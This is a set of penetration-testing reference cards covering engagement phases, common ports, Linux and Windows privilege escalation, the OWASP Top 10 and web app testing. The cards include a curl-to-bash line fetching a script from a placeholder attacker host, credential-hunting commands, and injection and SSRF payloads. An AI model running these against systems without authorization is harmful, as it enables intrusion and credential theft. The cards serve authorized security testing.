Quick-Reference Cards
Six rapid-lookup reference cards covering core penetration testing methodology, common ports, privilege escalation, and web application security. Print these, pin them up, and reach for them mid-engagement.
Card 1: Pentest Methodology
Phase 1 — Pre-Engagement
| Activity | Details |
|---|---|
| Scope definition | IP ranges, domains, excluded hosts, testing window |
| Rules of engagement | Attack types allowed, social engineering, DoS, physical |
| Authorization | Written permission (get-out-of-jail letter), legal review |
| Communication plan | Emergency contacts, status updates, incident escalation |
| Environment setup | VPN access, credentials (if gray/white box), test accounts |
| Deliverables | Signed statement of work, scope document, RoE |
Phase 2 — Reconnaissance
| Activity | Details |
|---|---|
| Passive OSINT | WHOIS, DNS records, Google dorking, social media, Shodan |
| Subdomain enumeration | Amass, Sublist3r, subfinder, certificate transparency |
| Email harvesting | theHarvester, Hunter.io, LinkedIn scraping |
| Technology fingerprinting | Wappalyzer, BuiltWith, WhatWeb |
| Active scanning | Nmap host discovery (-sn), port scanning (-sS/-sV/-sC) |
| Vulnerability scanning | Nessus, OpenVAS, Nikto, Nuclei |
| Deliverables | Target inventory, network map, vulnerability list |
Phase 3 — Exploitation
| Activity | Details |
|---|---|
| Vulnerability validation | Manual verification of scanner findings |
| Exploit selection | Metasploit, searchsploit, custom scripts |
| Initial access | Exploit vulnerability, credential attack, social engineering |
| Web exploitation | SQLi, XSS, RCE, file upload, deserialization |
| Password attacks | Brute force, spraying, credential stuffing, hash cracking |
| Client-side attacks | Phishing, malicious documents, USB drops |
| Deliverables | Proof of exploitation, screenshots, session evidence |
Phase 4 — Post-Exploitation
| Activity | Details |
|---|---|
| Privilege escalation | Kernel exploits, misconfigs, credential reuse |
| Persistence | Backdoors, scheduled tasks, registry, cron (if in scope) |
| Lateral movement | Pass-the-hash, Kerberos attacks, pivoting |
| Data discovery | Sensitive files, databases, credentials, PII |
| Credential harvesting | Mimikatz, hashdump, SAM/NTDS extraction |
| Network mapping | Internal recon, identify high-value targets |
| Deliverables | Full access evidence, data exposure proof, attack path map |
Phase 5 — Reporting
| Activity | Details |
|---|---|
| Executive summary | Business-level risk overview for leadership |
| Technical findings | Detailed findings with CVSS scores and evidence |
| Attack narrative | Step-by-step walkthrough of successful attack paths |
| Remediation guidance | Specific, prioritized fix recommendations |
| Appendices | Raw scan output, tool logs, full evidence |
| Deliverables | Final report (PDF), presentation, debrief meeting |
Phase 6 — Remediation Verification
| Activity | Details |
|---|---|
| Retest | Verify fixes for critical/high findings |
| Validation report | Confirm which issues are resolved |
| Deliverables | Retest report, updated risk register |
Card 2: Common Ports and Services (Top 50)
| Port | Protocol | Service | Attack Relevance |
|---|---|---|---|
| 21 | TCP | FTP | Anonymous login, cleartext creds, bounce attacks |
| 22 | TCP | SSH | Brute force, key-based auth bypass, version exploits |
| 23 | TCP | Telnet | Cleartext creds, banner grabbing |
| 25 | TCP | SMTP | Open relay, user enumeration (VRFY/EXPN), spoofing |
| 53 | TCP/UDP | DNS | Zone transfer, tunneling, cache poisoning |
| 67/68 | UDP | DHCP | Starvation, rogue DHCP server |
| 69 | UDP | TFTP | No authentication, file retrieval |
| 80 | TCP | HTTP | Web app attacks (OWASP Top 10) |
| 88 | TCP | Kerberos | AS-REP roasting, Kerberoasting, ticket attacks |
| 110 | TCP | POP3 | Cleartext creds, brute force |
| 111 | TCP | RPCBind | NFS enumeration, service discovery |
| 135 | TCP | MSRPC | Endpoint enumeration, remote execution |
| 139 | TCP | NetBIOS | SMB enumeration, null sessions |
| 143 | TCP | IMAP | Cleartext creds, brute force |
| 161/162 | UDP | SNMP | Default community strings, info leak |
| 389 | TCP | LDAP | Anonymous bind, enumeration, injection |
| 443 | TCP | HTTPS | Web app attacks, SSL/TLS vulnerabilities |
| 445 | TCP | SMB | EternalBlue, relay attacks, share enumeration |
| 464 | TCP | Kpasswd | Kerberos password change service |
| 512-514 | TCP | R-services | Remote execution without proper auth |
| 548 | TCP | AFP | Apple Filing Protocol enumeration |
| 554 | TCP | RTSP | Media streaming, default creds |
| 587 | TCP | SMTP (submission) | Email relay, authentication brute force |
| 593 | TCP | HTTP RPC | Endpoint mapper over HTTP |
| 636 | TCP | LDAPS | LDAP over SSL, certificate issues |
| 873 | TCP | Rsync | Anonymous access, file retrieval |
| 993 | TCP | IMAPS | Encrypted IMAP, brute force |
| 995 | TCP | POP3S | Encrypted POP3, brute force |
| 1080 | TCP | SOCKS | Open proxy pivoting |
| 1433 | TCP | MSSQL | Default SA, xp_cmdshell, SQLi |
| 1521 | TCP | Oracle | TNS listener, default creds |
| 1723 | TCP | PPTP VPN | Weak encryption (MS-CHAPv2) |
| 2049 | TCP | NFS | Mountable shares, no_root_squash |
| 3306 | TCP | MySQL | Default root no password, UDF exploit |
| 3389 | TCP | RDP | BlueKeep, brute force, session hijacking |
| 4443 | TCP | HTTPS (alt) | Alternative HTTPS services |
| 5432 | TCP | PostgreSQL | Default creds, command execution |
| 5900 | TCP | VNC | Weak/no authentication, brute force |
| 5985 | TCP | WinRM (HTTP) | Remote PowerShell, pass-the-hash |
| 5986 | TCP | WinRM (HTTPS) | Encrypted remote PowerShell |
| 6379 | TCP | Redis | No auth default, command execution |
| 8080 | TCP | HTTP Proxy/Alt | Web apps, management interfaces |
| 8443 | TCP | HTTPS Alt | Management consoles |
| 8888 | TCP | HTTP Alt | Jupyter, dev servers |
| 9090 | TCP | Various | Management consoles (Cockpit, WebSphere) |
| 9200 | TCP | Elasticsearch | No auth default, data exposure |
| 9389 | TCP | AD Web Services | Active Directory enumeration |
| 11211 | TCP/UDP | Memcached | No auth, amplification attacks |
| 27017 | TCP | MongoDB | No auth default, data exposure |
| 27018 | TCP | MongoDB (shard) | Sharded cluster access |
Card 3: Linux Privilege Escalation Checklist
Quick Wins
- [ ]
sudo -l— Check sudo permissions (GTFOBins for exploit) - [ ] SUID/SGID binaries:
find / -perm -4000 -type f 2>/dev/null - [ ] World-writable files:
find / -writable -type f 2>/dev/null - [ ] Credentials in files:
grep -rli "password" /etc/ /home/ /opt/ /var/ 2>/dev/null - [ ] Readable
/etc/shadow - [ ] Writable
/etc/passwd(add a root-level user) - [ ] SSH keys in home directories:
find / -name "id_rsa" 2>/dev/null
System Enumeration
- [ ] OS version:
cat /etc/os-release && uname -a - [ ] Kernel version:
uname -r(check for kernel exploits) - [ ] Running processes:
ps aux - [ ] Installed packages:
dpkg -lorrpm -qa - [ ] Network connections:
ss -tulnpornetstat -tulnp - [ ] Internal services not exposed externally
- [ ] Environment variables:
env(check for secrets) - [ ] Available compilers:
which gcc cc python python3 perl
File System
- [ ]
/etc/crontaband/var/spool/cron/— Cron jobs running as root - [ ] Writable cron scripts or directories
- [ ]
/opt/,/srv/,/var/— Non-standard applications - [ ] Config files: database creds, API keys, passwords
- [ ]
.bash_historyand other history files - [ ] Backup files:
*.bak,*.old,*.conf.bak - [ ] Log files with sensitive data:
/var/log/ - [ ] Mounted file systems:
mountandcat /etc/fstab - [ ] NFS exports with
no_root_squash:cat /etc/exports
Services and Networking
- [ ] Services running as root:
ps aux | grep root - [ ] Internal-only services (127.0.0.1)
- [ ] Docker socket accessible:
ls -la /var/run/docker.sock - [ ] Docker group membership:
id - [ ] LXD/LXC group membership
- [ ] Writable service files: systemd units, init scripts
Advanced
- [ ] Capabilities:
getcap -r / 2>/dev/null - [ ] PATH hijacking: writable directories in PATH
- [ ] Library hijacking:
LD_LIBRARY_PATH,LD_PRELOAD - [ ] Wildcard injection in cron scripts (tar, rsync)
- [ ] Python library hijacking
- [ ] Kernel exploits: DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195), etc.
Automated Tools
- LinPEAS:
curl ATTACKER/linpeas.sh | bash - LinEnum:
./linenum.sh - linux-exploit-suggester:
./les.sh - pspy: monitor processes without root
Card 4: Windows Privilege Escalation Checklist
Quick Wins
- [ ]
whoami /priv— Check for dangerous privileges: SeImpersonatePrivilege→ Potato attacks (JuicyPotato, PrintSpoofer, GodPotato)SeBackupPrivilege→ Read any file (SAM/SYSTEM/NTDS)SeRestorePrivilege→ Write any fileSeDebugPrivilege→ Inject into any processSeTakeOwnershipPrivilege→ Take ownership of any objectSeAssignPrimaryTokenPrivilege→ Token manipulation- [ ] Stored credentials:
cmdkey /list - [ ] Saved WiFi passwords:
netsh wlan show profiles - [ ] Unquoted service paths:
wmic service get name,pathname,startmode - [ ] AlwaysInstallElevated: check both HKLM and HKCU registry
System Enumeration
- [ ] System info:
systeminfo - [ ] OS version and patches:
wmic qfe list - [ ] Architecture:
echo %PROCESSOR_ARCHITECTURE% - [ ] Users and groups:
net user,net localgroup administrators - [ ] Network connections:
netstat -ano - [ ] Running processes:
tasklist /SVC - [ ] Installed software:
wmic product get name,version - [ ] Scheduled tasks:
schtasks /query /fo TABLE /nh - [ ] Services:
sc query state= all - [ ] Environment variables:
set
Service Exploitation
- [ ] Modifiable services:
accesschk.exe -uwcqv "Authenticated Users" * - [ ] Unquoted service paths with writable directories
- [ ] Weak service permissions (change binpath)
- [ ] DLL hijacking: missing DLLs in service executables
- [ ] Service restart permissions
Registry
- [ ] AutoRuns:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - [ ] AlwaysInstallElevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - [ ] Passwords in registry:
reg query HKLM /f password /t REG_SZ /s - [ ] AutoLogon credentials:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Credential Hunting
- [ ] SAM/SYSTEM backups:
C:\Windows\repair\,C:\Windows\System32\config\RegBack\ - [ ] Unattend files:
C:\Windows\Panther\Unattend.xml,Unattend.xml,sysprep.xml - [ ] IIS config:
C:\inetpub\wwwroot\web.config - [ ] PowerShell history:
(Get-PSReadLineOption).HistorySavePath - [ ] Cached credentials:
cmdkey /list→runas /savecred - [ ] Browser saved passwords
- [ ] KeePass databases, PuTTY sessions, FileZilla configs
- [ ] DPAPI credential files
Active Directory (if domain-joined)
- [ ] Domain enumeration:
net user /domain,net group /domain - [ ] BloodHound collection for attack paths
- [ ] Kerberoasting:
GetUserSPNs.py - [ ] AS-REP Roasting:
GetNPUsers.py - [ ] GPP passwords:
gpp-decrypt - [ ] LAPS:
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd
Automated Tools
- WinPEAS:
winpeas.exe - PowerUp:
Invoke-AllChecks - Seatbelt:
Seatbelt.exe -group=all - Watson: patch-level to exploit mapping
- SharpUp: C# port of PowerUp
Card 5: OWASP Top 10 (2021) Quick Reference
A01:2021 — Broken Access Control
What: Users can act outside their intended permissions.
| Vulnerability | Test |
|---|---|
| IDOR | Change object IDs in URLs/parameters |
| Missing function-level access control | Access admin endpoints as regular user |
| Privilege escalation | Modify role/privilege parameters |
| CORS misconfiguration | Check Access-Control-Allow-Origin |
| Directory traversal | ../../etc/passwd in file parameters |
| Forced browsing | Access restricted pages directly by URL |
A02:2021 — Cryptographic Failures
What: Failures related to cryptography (or lack thereof) that expose sensitive data.
| Vulnerability | Test |
|---|---|
| Cleartext transmission | Check for HTTP (non-HTTPS) on sensitive pages |
| Weak algorithms | MD5/SHA1 for passwords, DES, RC4 |
| Hard-coded keys/secrets | Source code review, config files |
| Missing encryption at rest | Database content, backups |
| Weak TLS configuration | testssl.sh, SSLyze |
A03:2021 — Injection
What: Untrusted data sent to an interpreter as part of a command or query.
| Vulnerability | Test |
|---|---|
| SQL injection | ' OR 1=1--, sqlmap |
| Command injection | ; ls, | whoami, `id` |
| LDAP injection | *)(uid=*))(|(uid=* |
| XPath injection | ' or 1=1 or ''=' |
| Template injection (SSTI) | {{7*7}}, ${7*7} |
| Header injection | CRLF: %0d%0a |
A04:2021 — Insecure Design
What: Flaws in design and architecture rather than implementation.
| Vulnerability | Test |
|---|---|
| Missing rate limiting | Brute force login attempts |
| Missing CAPTCHA | Automated form submissions |
| Weak security questions | Guessable or researchable answers |
| Trust boundary violations | Client-side validation only |
A05:2021 — Security Misconfiguration
What: Missing or incorrect security hardening across the application stack.
| Vulnerability | Test |
|---|---|
| Default credentials | admin/admin, admin/password, etc. |
| Unnecessary features enabled | Directory listing, debug mode |
| Verbose error messages | Stack traces, database errors |
| Missing security headers | X-Frame-Options, CSP, HSTS |
| Outdated software | Version detection, CVE lookup |
| Open cloud storage | S3 buckets, Azure blobs |
A06:2021 — Vulnerable and Outdated Components
What: Using components with known vulnerabilities.
| Vulnerability | Test |
|---|---|
| Outdated libraries | npm audit, pip-audit, OWASP Dependency-Check |
| Unpatched frameworks | Version fingerprinting, CVE search |
| Unsupported software | EOL products |
A07:2021 — Identification and Authentication Failures
What: Weaknesses in authentication mechanisms.
| Vulnerability | Test |
|---|---|
| Weak passwords allowed | Test password policy enforcement |
| Missing MFA | Check for MFA on sensitive operations |
| Credential stuffing | Test with known breached credentials |
| Session fixation | Check if session ID changes after login |
| Session tokens in URL | Review URL parameters |
| Missing logout/timeout | Check session expiration |
A08:2021 — Software and Data Integrity Failures
What: Failures to protect against integrity violations.
| Vulnerability | Test |
|---|---|
| Insecure deserialization | Modify serialized objects |
| Missing code signing | Unsigned updates or plugins |
| CI/CD pipeline compromise | Review pipeline security |
| Insecure auto-update | MITM update mechanisms |
A09:2021 — Security Logging and Monitoring Failures
What: Insufficient logging, detection, and response capabilities.
| Vulnerability | Test |
|---|---|
| Login failures not logged | Generate failures, check logs |
| No alerting | Trigger suspicious activity |
| Logs stored only locally | Check log aggregation |
| No integrity protection | Can logs be tampered with? |
A10:2021 — Server-Side Request Forgery (SSRF)
What: Application fetches remote resources without validating the user-supplied URL.
| Vulnerability | Test |
|---|---|
| Internal service access | http://127.0.0.1, http://localhost |
| Cloud metadata access | http://169.254.169.254/latest/meta-data/ |
| Internal port scanning | Iterate internal IPs/ports |
| Protocol smuggling | file://, gopher://, dict:// |
Card 6: Web Application Testing Checklist
Information Gathering
- [ ] Technology stack identification (Wappalyzer, WhatWeb)
- [ ] Directory and file enumeration (ffuf, Gobuster)
- [ ] Subdomain enumeration
- [ ] Virtual host discovery
- [ ] API endpoint discovery
- [ ] JavaScript file analysis for endpoints and secrets
- [ ] Robots.txt, sitemap.xml, .well-known
- [ ] Error page analysis for information disclosure
- [ ] HTTP methods testing (OPTIONS, PUT, DELETE, TRACE)
Authentication Testing
- [ ] Default credentials
- [ ] Password policy strength (minimum length, complexity)
- [ ] Account lockout mechanism
- [ ] Brute force protection / rate limiting
- [ ] Password reset mechanism security
- [ ] Remember me functionality
- [ ] Multi-factor authentication (present? bypassable?)
- [ ] Session token entropy (Burp Sequencer)
- [ ] Session invalidation on logout
- [ ] Session invalidation on password change
- [ ] Concurrent session handling
- [ ] Session fixation
- [ ] Cookie flags (Secure, HttpOnly, SameSite)
Authorization Testing
- [ ] Horizontal privilege escalation (access other users' data)
- [ ] Vertical privilege escalation (access admin functionality)
- [ ] IDOR on all object references (user IDs, file names, order IDs)
- [ ] Forced browsing to restricted pages
- [ ] API endpoint authorization checks
- [ ] HTTP method-based authorization bypass
- [ ] Directory traversal on file operations
Input Validation
- [ ] SQL injection (all input points, including headers and cookies)
- [ ] Cross-site scripting (reflected, stored, DOM-based)
- [ ] Command injection
- [ ] Server-side template injection (SSTI)
- [ ] XML External Entity (XXE)
- [ ] Server-side request forgery (SSRF)
- [ ] Local/remote file inclusion (LFI/RFI)
- [ ] HTTP parameter pollution
- [ ] HTTP request smuggling
- [ ] Open redirect
- [ ] CRLF injection
Business Logic
- [ ] Price manipulation (modify price in request)
- [ ] Quantity manipulation (negative values, zero)
- [ ] Workflow bypass (skip steps in multi-step process)
- [ ] Race conditions (concurrent requests)
- [ ] Feature abuse (unintended use of legitimate features)
- [ ] Coupon/discount code reuse
- [ ] Payment gateway bypass
File Operations
- [ ] File upload restrictions (bypass extension filters, MIME types)
- [ ] Upload path traversal
- [ ] Upload of web shells
- [ ] SVG upload for XSS
- [ ] File download / path traversal
- [ ] Zip slip vulnerability
Client-Side
- [ ] Cross-site request forgery (CSRF)
- [ ] Clickjacking (X-Frame-Options, CSP frame-ancestors)
- [ ] CORS misconfiguration
- [ ] WebSocket security
- [ ] Client-side storage (localStorage, sessionStorage) sensitive data
- [ ] Postmessage vulnerabilities
API-Specific
- [ ] API authentication (API keys, OAuth, JWT)
- [ ] JWT vulnerabilities (none algorithm, weak secret, algorithm confusion)
- [ ] Mass assignment / parameter binding
- [ ] Rate limiting on API endpoints
- [ ] Excessive data exposure in responses
- [ ] GraphQL introspection enabled
- [ ] GraphQL batching attacks
Configuration
- [ ] SSL/TLS configuration (testssl.sh, SSLyze)
- [ ] Security headers (check with securityheaders.com)
- [ ] HTTP to HTTPS redirect
- [ ] HSTS implementation
- [ ] Content Security Policy (CSP)
- [ ] Debug/development mode enabled
- [ ] Server version disclosure
- [ ] Directory listing enabled
These reference cards provide starting points for common testing activities. Adapt them to each engagement based on scope, technology stack, and testing objectives.